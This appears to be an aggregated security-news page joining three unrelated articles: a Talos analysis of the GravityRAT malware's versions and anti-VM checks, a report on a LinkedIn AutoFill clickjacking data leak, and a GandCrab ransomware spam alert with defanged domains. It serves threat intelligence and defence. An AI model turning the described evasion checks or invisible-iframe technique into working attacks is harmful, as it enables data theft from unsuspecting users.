Our initial discovery of GravityRAT was through a malicious Word document. As explained previously, this Word document had various macros to deliver a final payload.Considering that this was the most recent version of the malware, we decided to ascertain how long this actor had been active, and how their attacks had evolved. We were able to discover four distinct versions of GravityRAT, developed over two years. Next, we will go through what we believe is the development life cycle and feature-addition mission carried out by this developer.

Version G1

The malware author uses a versioning system starting by the G letter. The oldest version we identified is G1. Here is the PDB path of the sample:

f:\F\Windows Work\G1\Adeel's Laptop\G1 Main Virus\systemInterrupts\gravity\obj\x86\Debug\systemInterrupts.pdb

You can notice the potential first name of the developers: Adeel. Of course, this information can be manipulated by the malware author. This sample was compiled in December 2016. The original filename of the sample was resume.exe.

The purpose of this version was to steal information on the compromised system:

  • MAC Address
  • Computer name
  • Username
  • IP address
  • Date
  • Steal files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf and .pdf
  • The volumes mapped on the system

All this information was then sent to one of the following domains:

G1 also had the ability to execute commands remotely on the infected host machine at the author’s will.

Version G2

We identified a new variant used in July 2017 named G2. Here is the PDB of the sample:

e:\Windows Work\G2\G2 Main Virus\Microsoft Virus Solutions (G2 v5) (Current)\Microsoft Virus Solutions\obj\Debug\Windows Wireless 802.11.pdb

For this version, the developer modified the architecture of the malware. The main code aims to load and execute two additional .NET binaries stored in the resources of the file:

  • The first resource is a legitimate open-source library available on GitHub. It’s a .NET wrapper for the Windows Task Scheduler
  • The second is the G2 version of GravityRAT

This variant shares the same command and control (C2) servers as G1, however, we have an additional ‘payload’ variable added to G2.

This variant has almost identical capabilities as the previous, except one additional functionality: It collects the CPU information in the Win32_Processor entry via WMI request (Processor ID, Name, Manufacturer and the clock speed). The attacker is most likely using this information as part of an anti-vm attempt within this malware. This is used to try and thwart analysis in virtual environments.

In a slight change to the previous variant, the new payloads are executed with a Windows Scheduled Task. This would explain the inclusion of the .NET wrapper.

The analysed sample contained a decoy picture document in the resource section:


Version G3

In August 2017, the author of GravityRAT used a new variant of its malware, G3. Here is the PDB:

F:\Projects\g3\G3 Version 4.0\G3\G3\obj\Release\Intel Core.pdb

This variant uses the same method as G2, and includes a legitimate library in the resource section. The developers also added additional language support to the library:

  • German
  • Spanish
  • French
  • Italian
  • Chinese

The author changed the backend of the C2 server with this variant. The URI changed too, it contains the GravityRAT variant name:

August was also the same month the Indian CERT notified potential victims that GravityRAT had been used in a targeted campaign. Given the ongoing development nature of this malware, it meant another variant was most likely due.

Version GX

The latest version of GravityRAT was created in December 2017 named GX. Here is the PDB:

C:\Users\The Invincible\Desktop\gx\gx-current-program\LSASS\obj\Release\LSASS.pdb

This version is the most advanced variant of GravityRAT. Throughout the evolution, we saw this malware embedding open-source legitimate .NET libraries (for schedule tasks, compression, encryption, .NET loading). It contains a resource named “important.” This is an archive with a password.

This variant has the same features as before, but this time, some new features are added:

  • It collects open ports on the victim host by running the netstat command
  • It lists all the running processes
  • It lists available services on the system
  • It exfiltrates .ppt and .pptx file, in addition to the extension mentioned in the G1 variant
  • If a USB key is connected on the system, the malware steals the file based on an extension list
  • It supports file encryption (AES with the key “lolomycin2017”)
  • It collects information on the account (account type, description, domain name, full name, SID and status)
  • It checks if the system is a virtual machine with several techniques

The developer implemented a total of seven techniques to identify if the compromised system is a virtual machine.

The first technique consists of looking at any additional tools used by the hypervisor that are installed on the system (by checking a registry key):

The second technique uses a WMI request to the BIOS version (Win32_BIOS entry). If the response contains: “VMware”, “Virtual”, “XEN”, “Xen” or “A M I” the system is considered as a virtual machine. Additionally, the malware checks the SerialNumber and the version of the BIOS.

The third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains “VIRTUAL”, “VMWARE” or “VirtualBox”.

The fourth technique checks the Processor ID of the system.

The fifth technique counts the number of cores in the infected system (the author expects more than one core)

The sixth technique checks the current CPU temperature of the system (the MSAcpi_ThermalZoneTemperature entry). Indeed, some hypervisors (VMWare, VirtualBox and Hyper-V) do not support temperature check. The WMI request simply replies “not supported”. This behaviour can be used to detect if the targeted system is a real machine.

The last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known hexadecimal number, the system is identified as a virtual machine.

The C2 servers communication is performed in HTTP as it did previously. The variant version of GX is used in the URI. The C2 servers we can see are shared with the previous variants:


Below, we will present evidence that we have obtained regarding the attacker and the associated malware. Obviously, attribution is a complex field. The developers could be using a proxy or a VPN in order to fake the origin of the submission. But, we will still simply present some facts concerning this actor.

The developer used at least two different usernames in the past two years: “The Invincible” and “TheMartian.” In the oldest version of GravityRAT, the attacker potentially leaked his or her first name in the PDB: “Adeel” — the path contained “Adeel’s Laptop”. Additionally, all the malicious Office documents, and more specifically the documents used to test anti-virus on VirusTotal, were submitted from Pakistan. One of the four PE files in the IOCs section was sent from Pakistan, too.

In August 2017, the Indian National CERT published an advisory about malicious targeted campaigns. This advisory mentions the C2 server infrastructure of GravityRAT, which means the GravityRAT author likely targeted Indian entities/organisations. By leveraging Cisco Umbrella and using the Investigate tool, we were able to determine that across all of the C2 domains listed, we saw a large influx of traffic originating from India, as evidenced by the National CERT, all of the C2 domains were at least 50 percent requested by Indian IP infrastructure. It is possible that some of the non-Indian IP space requests may artefacts be due to our own research.


This actor is probably not the most advanced actor we’ve seen. But he or she managed to stay under the radar since 2016. They worked on malicious code, and produced four variants. Each new variant included new features. The developer used the same C2 infrastructure all this time. The developer was clever enough to keep this infrastructure safe, and not have it blacklisted by a security vendor. The actor took their time to ensure they were not within a virtual environment to avoid analysis. However, they did not take any time at all to attempt to obfuscate their .NET code. The code was largely trivial to reverse engineer, which meant static analysis was an easy option for this piece of malware.

The Indian CERT published an advisory about this actor, which suggest they targeted Indian entities and organizations.

The author leaked information within the samples (i.e. Adeel) and on the VirusTotal platform. Thanks to this information, we we able to understand how they tested malicious documents in order to decrease detection ratios across many popular engines. During this testing period, all the samples were uploaded from Pakistan to VirusTotal.


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on



Malicious Documents















C2 Servers




Go to Source
Author: Talos Group

Flaw in LinkedIn AutoFill Plugin Lets Third-Party Sites Steal Your Data

Not just Facebook, a new vulnerability discovered in Linkedin’s popular AutoFill functionality found leaking its users’ sensitive information to third party websites without the user even knowing about it.

LinkedIn provides an AutoFill plugin for a long time that other websites can use to let LinkedIn users quickly fill in profile data, including their full name, phone number, email address, ZIP code, company and job title, with a single click.

In general, the AutoFill button only works on specifically “whitelisted websites,” but 18-year-old security researcher Jack Cable of Lightning Security said it is not just the case.

Cable discovered that the feature was plagued with a simple yet important security vulnerability that potentially enabled any website (scrapers) secretly harvest user profile data and the user would not even realize of the event.

A legitimate website would likely place a AutoFill button near the fields the button can fill, but according to Cable, an attacker could secretly use the AutoFill feature on his website by changing its properties to spread the button across the entire web page and then make it invisible.

Since the AutoFill button is invisible, users clicking anywhere on the website would trigger AutoFill, eventually sending all of their public as well as private data requested to the malicious website, Cable explains.

Here’s How attackers can exploit the LinkedIn Flaw:

  • User visits the malicious website, which loads the LinkedIn AutoFill button iframe.
  • The iframe is styled in a way that it takes up the entire page and is invisible to the user.
  • The user then clicks anywhere on that page, and LinkedIn interprets this as the AutoFill button being pressed and sends the users’ data via postMessage to the malicious site.

Cable discovered the vulnerability on April 9th and immediately disclosed it to LinkedIn. The company issued a temporary fix the next day without informing the public of the issue.

The fix only restricted the use of LinkedIn’s AutoFill feature to whitelisted websites only who pay LinkedIn to host their advertisements, but Cable argued that the patch was incomplete and still left the feature open to abuse as whitelisted sites still could have collected user data.

Besides this, if any of the sites whitelisted by LinkedIn gets compromised, the AutoFill feature could be abused to send the collected data to malicious third-parties.

To demonstrate the issue, Cable also built a proof-of-concept test page, which shows how a website can grab your first and last name, email address, employer, and location.

Since a complete fix for the vulnerability was rolled out by LinkedIn on April 19, the above demo page might not work for you now.

“We immediately prevented unauthorized use of this feature, once we were made aware of the issue. We are now pushing another fix that will address potential additional abuse cases, and it will be in place shortly,” the company said in a statement.

“While we’ve seen no signs of abuse, we’re constantly working to ensure our members’ data stays protected. We appreciate the researcher responsible reporting this, and our security team will continue to stay in touch with them.”

Although the vulnerability is not at all a sophisticated or critical one, given the recent Cambridge Analytica scandal wherein data of over 87 million Facebook users was exposed, such security loopholes can pose a serious threat not only to the customers but also the company itself.

Go to Source

Security Alert: GandCrab Ransomware Returns with New Waves of Spam Campaigns

You may be familiar with GandCrab ransomware that seems to widely spread via various spam campaigns or social engineering techniques to infect and harvest users’ most important data.This fast-growing malware has infected more than 50,000 victims and targeting mostly the ones from Scandinavia and UK speaking countries, according to a report CheckPoint.

Security researchers recently analyzed a new spam campaign in which malicious actors try to lure victims into clicking a malicious link that will open a binary file and infect users’ system with the GandCrab ransomware.

This phishing campaign has been delivered with the following content (sanitized for your own protection).

Here’s how this email looks like:

From: [Spoof / Forwarded Sender Address]

Subject Line:
Job: Banking Opportunities, Greymouth

Dear Hiring Manager
Please review my [link: http: // abuellail [.] Com / resume. php] resume
Charlotte Anderson
Email: charlotte.anderson @ abuellail [.] com

If a user clicks on the link received on the email, then he will be redirected to one of the following and compromised web pages (sanitized for your online safety):

test.ritsdb [.] com
ubsms [.] com
test.technostark [.] com

How the infection happens

Basically, the malware is spread via an executable binary file (resume.exe) which is returned after GandCrab is running on the local machine as a file called “bhxsew.exe”.

During the process, the ransomware will try to collect and determine the external IP addresses of the victims via legitimate services such as:

Http: // ipv4bot.whatismyipaddress. com
Http: / /bot.whatismyipaddress. Com

The main component of GandCrab is “dropped” as a “bhxsew.exe” file in the directory. As part of the local data encryption, this malicious file is configured to communicate with the following domains:

zone alarm [.] bit
ransomware [.] bit

GandCrab ransomware is not spread only via spam emails but also seen distributed via an exploit kit campaign called MagnitudeEK which abuses software vulnerabilities found in Windows, Adobe Flash Player, and Silverlight.

As regards to the MagnitudeEK spam campaign, security researchers have seen a flood of subdomains being used via this site:

lieslow [.] faith

Malwarebytes Labs recently found that Magnitude EK, “which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.”

Here’s how the ransom note is displayed on the infected machine:

Source: Malwarebytes Labs blog

Heimdal Security proactively blocked these infected domains (and malicious emails), so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, 24 antivirus products out of 64 have detected this spam email campaign at the time we write this security alert.

How to stay safe from the GandCrab ransomware

One of the best ways to keep your important data safe from ransomware is to think and act proactively.

To minimize both the risks and the impact of these online threats, we recommend both home users and companies to use and apply these security measures:

  1. Always backup your data and use external sources such as a hard drive or in the cloud (Google Drive, Dropbox, etc.) to store it. Our guide will show you how to do it;
  2. DO NOT open (spam) or download attachments or links from unknown sources that could infect your computer;
  3. Use strong and unique passwords and never reuse them for multiple accounts. This security guide comes in handy;
  4. Consider using a paid antivirus software which is also up to date, or consider having a proactive anti ransomware protection (here’s what Heimdal PRO can do for you).
  5. Prevention is the best cure, so make sure you learn as much as possible about how to easily detect spam emails. These free educational resources can help you gain more knowledge in the cybersecurity field;
  6. Given the rise of new types of malware (the version 2 of GandCrab ransomware is out there and, unfortunately, there’s no decryption tool available) we remind you that security is not just about using a solution or another, it’s also about improving your online habits and being proactive.

Should you need to understand what ransomware is all about, this dedicated guide will help you.

If you’ve been a victim of the GandCrab ransomware, the good news is that there’s a decryption tool available you can use to recover the valuable data locked by ransomware.

*This article features cyber intelligence provided by CSIS Security Group researchers.

The post Security Alert: GandCrab Ransomware Returns with New Waves of Spam Campaigns appeared first on Heimdal Security Blog.

Go to Source
Author: Ioana Rijnetu